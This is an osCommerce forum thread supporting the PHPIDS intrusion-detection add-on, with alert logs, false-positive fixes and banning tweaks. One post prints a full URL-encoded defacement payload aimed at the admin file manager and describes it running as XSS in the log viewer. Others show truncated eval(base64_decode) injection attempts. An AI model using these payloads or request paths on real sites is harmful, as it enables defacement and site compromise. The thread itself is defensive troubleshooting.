marcsinfo Posted December 29, 2010 Share Posted December 29, 2010 Hi, After verifying once again, I have found a typo, I may have hit a key when pasting in the application_top.php file, sorry and thanks again for this great contribution. Marc Quote Link to comment Share on other sites More sharing options...
VAZ2121 Posted January 16, 2011 Share Posted January 16, 2011 There is a hack to the PHPIDS A hacker has written a script directly to hit this add-on. Here is the story... The PHPIDS sends me a mail about any attempt to hack the site. Today I received this: The following attack has been detected by PHPIDS IP: 78.177.107.5 Date: 2011-01-15T21:29:58+00:00 Impact: 138 Affected tags: xss csrf id rfe lfi sqli Affected parameters: REQUEST.file_contents=%3CHTML%3E+%0D%0A%3CHEAD%3E+%0D%0A+++%3CTITLE%3EHacked+By+SaMuRa%21%3C%2FTITLE%3E+%0D%0A+%3Ccenter%3E%3Cimg+src%3Dhttp%3A%2F%2Fwww.turkhackteam.net%2Fimages%2Fthtson.jpg%3E+%0D%0A+%3Cstyle%3E+%0D%0A%23legend%7Bwidth%3A+100%25%3B+position%3A+fixed%3B+background-color%3A222%3B+bottom%3A+0%3B+font-size%3A+13px%3B+left%3A+0%3B+border-top%3A%0D%0A1px+solid+white%3B+height%3A+20px%3B+padding%3A+5px%3Bcolor%3A%23gold%3Bfont-family%3Aarial%3B%7D%0D%0Aa%7Bcolor%3Awgite%3Btext-decoration%3Anone%3B%7D%0D%0Aa%3Ahover%7Bcolor%3A%23ccc%3B%7D%0D%0A%3C%2Fstyle%3E+%0D%0A+++%3Cdiv+id%3D%27legend%27%3E%3Ccenter%3E%3Cb%3ESaMuRa%21+-+Egoist+Group+-+TurkHackTeam.OrG%2FNet%3C%2Fb%3E%3C%2Fcenter%3E%3C%2Fdiv%3E+%0D%0A%3CBODY+TEXT%3D%22%239C9C9C%22+BGCOLOR%3D%22%23000000%22+LINK%3D%22%238B51FF%22+ALINK%3D%22%23FFF8FF%22%0D%0A+%3Cbody+bgcolor%3D%22%23000000%22%3E+%0D%0A++++++%3C%2Fspan%3E%3Cfont+color%3D%22White%22+size%3D%225%22%3E+%3C%2Fspan%3E%3Cfont+%0D%0A %3E%3CFONT+FACE%3D%22tahoma%22+color%3D%22%23999999%22%3E++++%0D%0A%3Ccenter%3E%3Cbr%3E%3C%2Fspan%3E%3Cspan+style%3D%22font-weight%3Abold%3B+text-shadow%3Awhite+0px+0px+8px%3B+color%3Awhite%22%3E%3Cfont+color%3Dred%3EHacked+By+SaMuRa%21+-+Black-Box+-+Dejavue+-+CaLLouS%3Cbr%3E%3C%2Ffont%3E%3C%2Fspan+%0D%0A%3E%0D%0A%3CP%3E%3CTABLE+BORDER%3D0+WIDTH%3D%22100%25%22+HEIGHT%3D%22100%25%22%3E+%0D%0A+%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%22red%22+size%3D%222%22%3E%3Cb%3E%22+Biz+eskimeyenlerdeniz%2C+Hayatta+oldugumuz+surece+her+donem+bizim+donemimiz%21+%22%0D%0A+%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cb%3E%3Cb%3E%3Cb%3E+%0D%0A%3Cbr%3E%0D%0A%3Cbr%3E%0D%0A%3Cbr%3E%0D%0A%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%22white%22+size%3D%222%22%3E%3Cb%3E%3C+www.facebook.com%2Fhackingplatform+%3E%0D%0A%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%22white%22+size%3D%222%22%3E%3Cb%3E-------------------------------------------+%0D%0A+%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fb%3 E%3C%2Fcenter%3E%3Cb%3E%3Cb%3E%3Cb%3E+%0D%0A++++++++%3C%2Fb%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Fp%3E+%0D%0A%3Cbr%3E%3C%2Fspan%3E%3Cfont+color%3D%22white%22+size%3D%222%22%3C%2Ffont%3E%3Cbr%3E+, POST.file_contents=%3CHTML%3E+%0D%0A%3CHEAD%3E+%0D%0A+++%3CTITLE%3EHacked+By+SaMuRa%21%3C%2FTITLE%3E+%0D%0A+%3Ccenter%3E%3Cimg+src%3Dhttp%3A%2F%2Fwww.turkhackteam.net%2Fimages%2Fthtson.jpg%3E+%0D%0A+%3Cstyle%3E+%0D%0A%23legend%7Bwidth%3A+100%25%3B+position%3A+fixed%3B+background-color%3A222%3B+bottom%3A+0%3B+font-size%3A+13px%3B+left%3A+0%3B+border-top%3A%0D%0A1px+solid+white%3B+height%3A+20px%3B+padding%3A+5px%3Bcolor%3A%23gold%3Bfont-family%3Aarial%3B%7D%0D%0Aa%7Bcolor%3Awgite%3Btext-decoration%3Anone%3B%7D%0D%0Aa%3Ahover%7Bcolor%3A%23ccc%3B%7D%0D%0A%3C%2Fstyle%3E+%0D%0A+++%3Cdiv+id%3D%5C%27legend%5C%27%3E%3Ccenter%3E%3Cb%3ESaMuRa%21+-+Egoist+Group+-+TurkHackTeam.OrG%2FNet%3C%2Fb%3E%3C%2Fcenter%3E%3C%2Fdiv%3E+%0D%0A%3CBODY+TEXT%3D%5C%22%239C9C9C% 5C%22+BGCOLOR%3D%5C%22%23000000%5C%22+LINK%3D%5C%22%238B51FF%5C%22+ALINK%3D%5C%22%23FFF8FF%5C%22%0D%0A+%3Cbody+bgcolor%3D%5C%22%23000000%5C%22%3E+%0D%0A++++++%3C%2Fspan%3E%3Cfont+color%3D%5C%22White%5C%22+size%3D%5C%225%5C%22%3E+%3C%2Fspan%3E%3Cfont+%0D%0A%3E%3CFONT+FACE%3D%5C%22tahoma%5C%22+color%3D%5C%22%23999999%5C%22%3E++++%0D%0A%3Ccenter%3E%3Cbr%3E%3C%2Fspan%3E%3Cspan+style%3D%5C%22font-weight%3Abold%3B+text-shadow%3Awhite+0px+0px+8px%3B+color%3Awhite%5C%22%3E%3Cfont+color%3Dred%3EHacked+By+SaMuRa%21+-+Black-Box+-+Dejavue+-+CaLLouS%3Cbr%3E%3C%2Ffont%3E%3C%2Fspan+%0D%0A%3E%0D%0A%3CP%3E%3CTABLE+BORDER%3D0+WIDTH%3D%5C%22100%25%5C%22+HEIGHT%3D%5C%22100%25%5C%22%3E+%0D%0A+%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%5C%22red%5C%22+size%3D%5C%222%5C%22%3E%3Cb%3E%5C%22+Biz+eskimeyenlerdeniz%2C+Hayatta+oldugumuz+surece+her+donem+bizim+donemimiz%21+%5C%22%0D%0A+%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cb%3E%3Cb%3E%3Cb%3E+%0D%0A%3Cbr%3E%0D%0A%3Cbr%3E%0D%0A%3Cbr%3 E%0D%0A%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%5C%22white%5C%22+size%3D%5C%222%5C%22%3E%3Cb%3E%3C+www.facebook.com%2Fhackingplatform+%3E%0D%0A%3Ccenter%3E%3Cb%3E%3Cb%3E%3Cfont+color%3D%5C%22white%5C%22+size%3D%5C%222%5C%22%3E%3Cb%3E-------------------------------------------+%0D%0A+%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cb%3E%3Cb%3E%3Cb%3E+%0D%0A++++++++%3C%2Fb%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Fp%3E+%0D%0A%3Cbr%3E%3C%2Fspan%3E%3Cfont+color%3D%5C%22white%5C%22+size%3D%5C%222%5C%22%3C%2Ffont%3E%3Cbr%3E+, Request URI: %2Fproduct_info.php%2Fadmin%2Ffile_manager.php%2Flogin.php%3Faction%3Dsave I receive a lot of those mails. This is however a bit different, so I decided to take a look at it. I started the Admin, and would see the PHPIDS Log. Now something happened. The code that this hacker wrote, started to execute in my Admin !!! So there is no execution-filter in viewing the Log. The hacker has used this exploit in the PHPIDS !!!!. I have checked all my files, nothing has changed. This was a mild hack, it only displayed a message in my Admin. Regards, Stig Quote Link to comment Share on other sites More sharing options...
design4dotcom Posted January 19, 2011 Share Posted January 19, 2011 I've looked through this post and didn't find anything that related to our problem. We installed this mod two weeks ago on OS 2.2 and since that time, we have received a DELUGE of emails. No error codes, so I'm assuming the mod is installed correctly. Here is a sample email. The following attack has been detected by PHPIDS IP: 74.179.238.17 Date: 2011-01-13T17:28:13-06:00 Impact: 14 Affected tags: xss csrf id rfe lfi Affected parameters: COOKIE.__gutp=entrystamp%3D1294961008%7Csid%3D744d342d840d08c84bd807750173d6 7f%7Cstamp%3D1294961281%7Creferrer%3Dhttp%3A%2F%2Finfo.bellperformance.com%2 Fx-tra-lube-oil-treatment%2F%7Contime%3D246, Request URI: /index.php?cPath=23_28 Origin: 174.121.10.217 or this one. The following attack has been detected by PHPIDS IP: 208.87.234.180 (71.43.111.162) Date: 2011-01-14T09:42:24-06:00 Impact: 14 Affected tags: xss csrf rfe dos Affected parameters: COOKIE.__gutp=entrystamp%3D1294949465%7Csid%3D61d87f99248116c748031e0728a30d 09%7Cstamp%3D1294949775%7Contime%3D99, Request URI: /specials.php Origin: 174.121.10.217 They just keep coming! Are these hacks? Honestly, I didn't expect that many. Or is there something else going on? Thank you SO MUCH Quote Thank you in advance, Michelle Link to comment Share on other sites More sharing options...
celextel Posted January 19, 2011 Author Share Posted January 19, 2011 I've looked through this post and didn't find anything that related to our problem. We installed this mod two weeks ago on OS 2.2 and since that time, we have received a DELUGE of emails. No error codes, so I'm assuming the mod is installed correctly. Here is a sample email. The following attack has been detected by PHPIDS IP: 74.179.238.17 Date: 2011-01-13T17:28:13-06:00 Impact: 14 Affected tags: xss csrf id rfe lfi Affected parameters: COOKIE.__gutp=entrystamp%3D1294961008%7Csid%3D744d342d840d08c84bd807750173d6 7f%7Cstamp%3D1294961281%7Creferrer%3Dhttp%3A%2F%2Finfo.bellperformance.com%2 Fx-tra-lube-oil-treatment%2F%7Contime%3D246, Request URI: /index.php?cPath=23_28 Origin: 174.121.10.217 or this one. The following attack has been detected by PHPIDS IP: 208.87.234.180 (71.43.111.162) Date: 2011-01-14T09:42:24-06:00 Impact: 14 Affected tags: xss csrf rfe dos Affected parameters: COOKIE.__gutp=entrystamp%3D1294949465%7Csid%3D61d87f99248116c748031e0728a30d 09%7Cstamp%3D1294949775%7Contime%3D99, Request URI: /specials.php Origin: 174.121.10.217 They just keep coming! Are these hacks? Honestly, I didn't expect that many. Or is there something else going on? Thank you SO MUCH These are not hacks. It seems to be generated by a module for tracking the referrer in your website. You could include these values [COOKIE.__gutp and so on] under exclusions in PHPIDS admin. Quote Link to comment Share on other sites More sharing options...
design4dotcom Posted February 14, 2011 Share Posted February 14, 2011 Wow, thank you. that WORKED!!! Quote Thank you in advance, Michelle Link to comment Share on other sites More sharing options...
♥altoid Posted February 14, 2011 Share Posted February 14, 2011 (edited) I was looking for the PHP IDS website at "http://php-ids.org/" Got this message auf Deutsch: Dieser Server ist nicht mehr in Betrieb. Bitte teilen Sie dem Betreiber mit, dass er seinen DNS auf die neue IP 46.4.40.248 umstellt. schokokeks.org A little googling came up with the revised site it seems. "http://phpids.org/" I hope that's a valid site. Edited February 14, 2011 by altoid Quote I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
celextel Posted February 15, 2011 Author Share Posted February 15, 2011 I was looking for the PHP IDS website at "http://php-ids.org/" Got this message auf Deutsch: Dieser Server ist nicht mehr in Betrieb. Bitte teilen Sie dem Betreiber mit, dass er seinen DNS auf die neue IP 46.4.40.248 umstellt. schokokeks.org A little googling came up with the revised site it seems. "http://phpids.org/" I hope that's a valid site. URL seems to have changed. You could do the download of PHPIDS 0.6.5 (ZIP) at the following URL: http://phpids.org/downloads/ Quote Link to comment Share on other sites More sharing options...
♥altoid Posted February 15, 2011 Share Posted February 15, 2011 URL seems to have changed. You could do the download of PHPIDS 0.6.5 (ZIP) at the following URL: http://phpids.org/downloads/ I will check that out. It looks like they still need to update some links on their new site. Some links there take you to the inactive URL. Thanks Quote I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
♥altoid Posted February 25, 2011 Share Posted February 25, 2011 I will check that out. It looks like they still need to update some links on their new site. Some links there take you to the inactive URL. Thanks Hello, I downloaded and installed the latest version of PHPIDS 0.6.5. In the testing mode test 1 works as it should, showing the result at the tope but test 2 resulted in "http 406 not acceptable" error and not showing the results at the top. Quote I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
celextel Posted February 25, 2011 Author Share Posted February 25, 2011 Hello, I downloaded and installed the latest version of PHPIDS 0.6.5. In the testing mode test 1 works as it should, showing the result at the tope but test 2 resulted in "http 406 not acceptable" error and not showing the results at the top. Please refer to first page of this thread in regard to this. Quote Link to comment Share on other sites More sharing options...
♥altoid Posted February 25, 2011 Share Posted February 25, 2011 Please refer to first page of this thread in regard to this. Thank you for the reference. I believe that means my hosts server is capturing this input and generating the 406 error page. Which, on the face of it, is a layer of protection I might want unless there are other factors involved. Anyway, thanks again I do appreciate the help. Quote I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
celextel Posted February 25, 2011 Author Share Posted February 25, 2011 Thank you for the reference. I believe that means my hosts server is capturing this input and generating the 406 error page. Which, on the face of it, is a layer of protection I might want unless there are other factors involved. Anyway, thanks again I do appreciate the help. It should show the test result even for 406. Please create a support request with your host in regard to this. Quote Link to comment Share on other sites More sharing options...
♥altoid Posted February 25, 2011 Share Posted February 25, 2011 It should show the test result even for 406. Please create a support request with your host in regard to this. I will do that and post back here what the outcome is. Thanks for the follow up. Quote I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
Code Red Posted March 1, 2011 Share Posted March 1, 2011 First of all, thanks for this great contribution - it's scary to see the number of times a website is attacked per day! It mostly seems to be working fine, just a couple of issues - 1. The auto-ban function doesn't seem to work. I have the config settings as follows - PHPIDS Module true IP Ban Module true Show Intrusion Result false E-mail Log Impact Score 8 DB Log Impact Score 4 IP Ban Impact Score 15 However, despite attack impacts in excess of 38, none of the hacker's IPs have been automatically banned. I've added a "ban all" option to the log page to save doing them all individually, but obviously I'd rather the site did it automatically, as frequently the same IP will make several attempts and I'd prefer them blocked in the first instance. Has anyone else experienced this problem? 2. Frequently the IP address recorded is 127.0.0.1, which is no use to block obviously. However, sometimes the email report I get does log the actual IP address alongside the localhost address, for example - IP: 87.111.138.205 (127.0.0.1) Date: 2011-03-01T14:42:58+00:00 Impact: 38 Affected tags: xss csrf id rfe sqli lfi Affected parameters: REQUEST.asc=eval%28base64_decode%28%5C%27ZXJyb3JfcmVwb3J0aW5nKDApO3NldF90aW1lX2xpbWl0KDApOw0KJH...etc etc (shortened for your viewing pleasure!) Request URI: /index.php Origin: 92.48.117.50 But when I check the log, it's been recorded just as 127.0.0.1... if the email message sent to me can log the real IP address, can the script be modified to pick this up and write it to the log? Just a couple of issues, but aside from that, this is great work and I'm very grateful! Quote Link to comment Share on other sites More sharing options...
celextel Posted March 2, 2011 Author Share Posted March 2, 2011 (edited) First of all, thanks for this great contribution - it's scary to see the number of times a website is attacked per day! It mostly seems to be working fine, just a couple of issues - 1. Please refer to page 9 of this thread. We have mentioned as follows: Changing the code in banned.php $ip_2ban_address = $_SERVER['REMOTE_ADDR']; to $ip_2ban_address = tep_get_ip_address(); would be a better option. Most of the IPs should get banned automatically. We should not have this problem. 2. We have not done any code changes to PHPIDS core module. Please make a request in regard to this in that forum. Edited March 2, 2011 by celextel Quote Link to comment Share on other sites More sharing options...
Code Red Posted March 2, 2011 Share Posted March 2, 2011 Changing the code in banned.php $ip_2ban_address = $_SERVER['REMOTE_ADDR']; to $ip_2ban_address = tep_get_ip_address(); would be a better option. Most of the IPs should get banned automatically. We should not have this problem. Actually, it was the opposite which fixed it! The code was already using tep_get_ip_address, changing it to $_SERVER['REMOTE_ADDR'] did the trick - IPs are now automatically banned, thankyou! Quote Link to comment Share on other sites More sharing options...
celextel Posted March 3, 2011 Author Share Posted March 3, 2011 (edited) Actually, it was the opposite which fixed it! The code was already using tep_get_ip_address, changing it to $_SERVER['REMOTE_ADDR'] did the trick - IPs are now automatically banned, thankyou! You are correct. It should be: change $ip_2ban_address = tep_get_ip_address(); to $ip_2ban_address = $_SERVER['REMOTE_ADDR']; Edited March 3, 2011 by celextel Quote Link to comment Share on other sites More sharing options...
♥altoid Posted March 6, 2011 Share Posted March 6, 2011 It should show the test result even for 406. Please create a support request with your host in regard to this. This is a follow up to the 406 issue. I contacted my host support and didn't get much resolved. They said: Ok Steve, I did check with Tier 2, unfortunately, since this addon isn't our product, we can't be sure what is stopping this certain function from working. If you could check back with the developer and show him that phpinfo page I shared with you earlier, he might have a better idea for what on our server is preventing this certain aspect of the addon from working. Celextel, I am content to let this go as is and not dwell on the issue anymore. If a 406 is thrown for such attempts, then the intruder can't even make to my site with such parameters in the url. I would say that's a positive thing in it's own right. I thank you for the great support for this add on. Quote I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
♥altoid Posted March 19, 2011 Share Posted March 19, 2011 Just a note to anyone who may follow this forum. Last night there was an attempt on my site involving base64 coding that PHPIDS flagged out. Affected parameters: REQUEST.author_name=%5Bphp%5Deval%28base64_decode%28% ....and then the base64 string, not included here..... Request URI: /links.php/contact.php The impact score was 74 This was the first such attempt on this site that I am aware of, so I ran Site Monitor and WinGrep just to be sure. All is OK. Quote I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
celextel Posted November 6, 2011 Author Share Posted November 6, 2011 NEW!! PHPIDS for osCommerce 1.7 for osCommerce Online Merchant v2.3.1 1. admin/phpids_report.php, admin/banned_ip.php and banned.php files modified [for osCommerce Online Merchant v2.3.1 only]. Do not update these 3 files if you are using osCommerce Online Merchant v2.2. 2. Added one more column to the PHPIDS table. Run the installer file to add this column. 3. PHPIDS 0.7 is ready. Quote Link to comment Share on other sites More sharing options...
JoshBowe Posted November 7, 2011 Share Posted November 7, 2011 Hi, Just installed PHPIDS on 2.3.1 and can't seem to get it to work. As soon as I turn it on through the admin control panel my website front page just won't load. :( I've followed the steps exactly as they are in the install guide, my "phpids" file was uploaded to website.com/includes/phpids without the catalog part. Could that be causing the problem? Otherwise I did everything as it said. Any help would be appreciated, cheers. Quote Link to comment Share on other sites More sharing options...
mhondebrink Posted November 16, 2011 Share Posted November 16, 2011 I got the following message when I try to do the following test http://www.example.com/?id=1&test=">XXX works fine What can be the issue? Quote Link to comment Share on other sites More sharing options...
PLUGGER Posted November 21, 2011 Share Posted November 21, 2011 is there any way of having this send out emails to an alternate email address and not the owner of the store i.e. the store developer instead and excuse me if i have missed the answer already Quote If it don't fit - Get a bigger hammer Link to comment Share on other sites More sharing options...
guicher Posted November 24, 2011 Share Posted November 24, 2011 (edited) Hi all, I've just installed this contribution and I've checked the installation twice, so that I've made no errors. But I still have a problem. Before entering the test URL's I set the following settings. PHPIDS Module : true IP Ban Module : true Show Intrusion Result : true E-mail Log Impact Score : 8 DB Log Impact Score : 4 IP Ban Impact Score : 70 After entering the test URL's nothing happens. No message at the top of the page, no entries into the database and no emails received. Also nothing is written into the log file (which has chmod 777). When I enter an IP address manually into de banned IP's (via tools) the blocking work as it should. Can anyone help me out here? Kind regards Rene Guicherit (aka guicher) Edited November 24, 2011 by guicher Quote Link to comment Share on other sites More sharing options...
guicher Posted November 25, 2011 Share Posted November 25, 2011 Hi all, I've just installed this contribution and I've checked the installation twice, so that I've made no errors. But I still have a problem. Before entering the test URL's I set the following settings. PHPIDS Module : true IP Ban Module : true Show Intrusion Result : true E-mail Log Impact Score : 8 DB Log Impact Score : 4 IP Ban Impact Score : 70 After entering the test URL's nothing happens. No message at the top of the page, no entries into the database and no emails received. Also nothing is written into the log file (which has chmod 777). When I enter an IP address manually into de banned IP's (via tools) the blocking work as it should. Can anyone help me out here? Kind regards Rene Guicherit (aka guicher) Just tested the website with Kyplex security scan. And know what! All kinds of intrusions are detected and reported. So I think it's working. Only the test URL's which came with the installation manual don't work? Kind regards guicher Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.